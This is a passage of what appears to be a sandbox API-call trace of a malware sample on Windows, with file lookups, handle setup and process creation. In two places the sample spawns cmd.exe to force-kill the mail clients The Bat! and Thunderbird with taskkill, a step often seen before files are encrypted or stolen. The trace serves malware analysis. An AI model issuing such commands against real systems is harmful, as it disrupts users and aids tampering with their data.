nFileSizeLow=0x0)) returned 0 [0223.693] CreateFileW (lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0223.693] GetEnvironmentVariableW (in: lpName="path", lpBuffer=0x1247cea0, nSize=0x64 | out: lpBuffer="") returned 0x63 [0223.693] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x12497318 | out: lpFileInformation=0x12497318*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0223.693] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1247cf70, nSize=0x64 | out: lpBuffer="") returned 0x35 [0223.693] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x12497368 | out: lpFileInformation=0x12497368*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0223.693] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0223.694] GetConsoleMode (in: hConsoleHandle=0x158, lpMode=0x123a3a7c | out: lpMode=0x123a3a7c) returned 0 [0223.694] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0223.694] GetConsoleMode (in: hConsoleHandle=0x138, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0223.694] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0223.694] GetConsoleMode (in: hConsoleHandle=0x134, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0223.694] GetEnvironmentStringsW () returned 0x8ea900* [0223.695] FreeEnvironmentStringsW (penv=0x8ea900) returned 1 [0223.695] GetCurrentProcess () returned 0xffffffff [0223.695] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x158, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x124a8fa0, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x124a8fa0*=0x130) returned 1 [0223.695] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x138, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x124a8fa4, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x124a8fa4*=0x13c) returned 1 [0223.695] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x134, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x124a8fa8, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x124a8fa8*=0x140) returned 1 [0223.695] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="cmd.exe /c \"taskkill /f /im thebat64.exe \"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x400, lpEnvironment=0x124ec000, lpCurrentDirectory=0x0, lpStartupInfo=0x123a3aa4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x130, hStdOutput=0x13c, hStdError=0x140), lpProcessInformation=0x123a3a80 | out: lpCommandLine="cmd.exe /c \"taskkill /f /im thebat64.exe \"", lpProcessInformation=0x123a3a80*(hProcess=0x154, hThread=0x144, dwProcessId=0xd30, dwThreadId=0xd18)) returned 1 [0223.714] CloseHandle (hObject=0x144) returned 1 [0223.714] CloseHandle (hObject=0x140) returned 1 [0223.714] CloseHandle (hObject=0x13c) returned 1 [0223.715] CloseHandle (hObject=0x130) returned 1 [0223.715] CloseHandle (hObject=0x158) returned 1 [0223.715] CloseHandle (hObject=0x138) returned 1 [0223.715] CloseHandle (hObject=0x134) returned 1 [0223.715] WaitForSingleObject (hHandle=0x154, dwMilliseconds=0xffffffff) returned 0x0 [0224.852] SetEvent (hEvent=0x150) returned 1 [0224.853] GetExitCodeProcess (in: hProcess=0x154, lpExitCode=0x123a3bb4 | out: lpExitCode=0x123a3bb4*=0x80) returned 1 [0224.853] GetProcessTimes (in: hProcess=0x154, lpCreationTime=0x1249fa40, lpExitTime=0x1249fa48, lpKernelTime=0x1249fa50, lpUserTime=0x1249fa58 | out: lpCreationTime=0x1249fa40, lpExitTime=0x1249fa48, lpKernelTime=0x1249fa50, lpUserTime=0x1249fa58) returned 1 [0224.854] CloseHandle (hObject=0x154) returned 1 [0224.854] SetEvent (hEvent=0x128) returned 1 [0224.854] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x5) returned 0x102 [0224.860] SetEvent (hEvent=0x150) returned 1 [0224.860] SetEvent (hEvent=0x128) returned 1 [0224.866] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1248af70, nSize=0x64 | out: lpBuffer="") returned 0x35 [0224.869] GetFileAttributesExW (in: lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x124a3368 | out: lpFileInformation=0x124a3368*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0224.869] CreateFileW (lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0224.870] GetFileAttributesExW (in: lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), fInfoLevelId=0x0, lpFileInformation=0x124a33b8 | out: lpFileInformation=0x124a33b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0224.870] CreateFileW (lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0224.870] GetFileAttributesExW (in: lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0x124a3408 | out: lpFileInformation=0x124a3408*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0224.870] CreateFileW (lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0224.870] GetFileAttributesExW (in: lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0x124a3458 | out: lpFileInformation=0x124a3458*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0224.870] CreateFileW (lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0224.870] GetFileAttributesExW (in: lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x124a34a8 | out: lpFileInformation=0x124a34a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0224.870] CreateFileW (lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0224.870] GetFileAttributesExW (in: lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0x124a34f8 | out: lpFileInformation=0x124a34f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0224.870] CreateFileW (lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0224.871] GetFileAttributesExW (in: lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0x124a3548 | out: lpFileInformation=0x124a3548*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0224.871] CreateFileW (lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0224.871] GetFileAttributesExW (in: lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), fInfoLevelId=0x0, lpFileInformation=0x124a3598 | out: lpFileInformation=0x124a3598*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0224.871] CreateFileW (lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0224.871] GetFileAttributesExW (in: lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0x124a35e8 | out: lpFileInformation=0x124a35e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0224.871] CreateFileW (lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0224.871] GetFileAttributesExW (in: lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0x124a3638 | out: lpFileInformation=0x124a3638*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0224.879] CreateFileW (lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0224.879] GetFileAttributesExW (in: lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0x124a3688 | out: lpFileInformation=0x124a3688*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0224.879] CreateFileW (lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0224.879] GetFileAttributesExW (in: lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0x124a36d8 | out: lpFileInformation=0x124a36d8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0224.879] CreateFileW (lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0224.879] GetEnvironmentVariableW (in: lpName="path", lpBuffer=0x1248b040, nSize=0x64 | out: lpBuffer="") returned 0x63 [0224.880] VirtualAlloc (lpAddress=0x0, dwSize=0x40000, flAllocationType=0x3000, flProtect=0x4) returned 0x1c0000 [0224.880] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x124a3728 | out: lpFileInformation=0x124a3728*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0224.881] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1248b110, nSize=0x64 | out: lpBuffer="") returned 0x35 [0224.881] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x124a3778 | out: lpFileInformation=0x124a3778*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0224.881] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0224.881] GetConsoleMode (in: hConsoleHandle=0x154, lpMode=0x123a3a7c | out: lpMode=0x123a3a7c) returned 0 [0224.881] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0224.881] GetConsoleMode (in: hConsoleHandle=0x134, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0224.882] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0224.882] GetConsoleMode (in: hConsoleHandle=0x138, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0224.882] GetEnvironmentStringsW () returned 0x8ea900* [0224.883] FreeEnvironmentStringsW (penv=0x8ea900) returned 1 [0224.883] GetCurrentProcess () returned 0xffffffff [0224.883] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x154, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x124b92d0, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x124b92d0*=0x158) returned 1 [0224.883] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x134, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x124b92d4, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x124b92d4*=0x130) returned 1 [0224.884] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x138, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x124b92d8, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x124b92d8*=0x13c) returned 1 [0224.884] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="cmd.exe /c \"taskkill /f /im thunderbird.exe \"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x400, lpEnvironment=0x124dca80, lpCurrentDirectory=0x0, lpStartupInfo=0x123a3aa4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x158, hStdOutput=0x130, hStdError=0x13c), lpProcessInformation=0x123a3a80 | out: lpCommandLine="cmd.exe /c \"taskkill /f /im thunderbird.exe \"", lpProcessInformation=0x123a3a80*(hProcess=0x144, hThread=0x140, dwProcessId=0x8e8, dwThreadId=0xfb8)) returned 1 [0224.906] CloseHandle (hObject=0x140) returned 1 [0224.906] CloseHandle (hObject=0x13c) returned 1 [0224.906] CloseHandle (hObject=0x130) returned 1 [0224.906] CloseHandle (hObject=0x158) returned 1 [0224.906] CloseHandle (hObject=0x154) returned 1 [0224.906] CloseHandle (hObject=0x134) returned 1 [0224.906] CloseHandle (hObject=0x138) returned 1 [0224.906] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0xffffffff) returned 0x0 [0226.189] SetEvent (hEvent=0x150) returned 1 [0226.189] GetExitCodeProcess (in: hProcess=0x144, lpExitCode=0x123a3bb4 | out: lpExitCode=0x123a3bb4*=0x0) returned 1 [0226.189] GetProcessTimes (in: hProcess=0x144, lpCreationTime=0x124f4000, lpExitTime=0x124f4008, lpKernelTime=0x124f4010, lpUserTime=0x124f4018 | out: lpCreationTime=0x124f4000, lpExitTime=0x124f4008, lpKernelTime=0x124f4010, lpUserTime=0x124f4018) returned 1 [0226.189] CloseHandle (hObject=0x144) returned 1 [0226.190] SetEvent (hEvent=0x128) returned 1 [0226.190] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x5) returned 0x102 [0226.199] SetEvent (hEvent=0x150) returned 1 [0226.199] SetEvent (hEvent=0x128) returned 1 [0226.199] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1247d040, nSize=0x64 | out: lpBuffer="") returned 0x35 [0226.200] GetFileAttributesExW (in: lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x124973b8 | out: lpFileInformation=0x124973b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0226.200] CreateFileW (lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0226.200] GetFileAttributesExW (in: lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), fInfoLevelId=0x0, lpFileInformation=0x12497408 | out: lpFileInformation=0x12497408*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0226.200] CreateFileW (lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0226.200] GetFileAttributesExW (in: lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0x12497458 | out: lpFileInformation=0x12497458*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0226.201] CreateFileW (lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0226.201] GetFileAttributesExW (in: lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0x124974a8 | out: lpFileInformation=0x124974a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0226.201] CreateFileW (lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0226.201] GetFileAttributesExW (in: lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x124974f8 | out: lpFileInformation=0x124974f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0226.201] CreateFileW (lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0226.201] GetFileAttributesExW (in: lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0x12497548 | out: lpFileInformation=0x12497548*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0226.201] CreateFileW (lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0226.201] GetFileAttributesExW (in: lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), 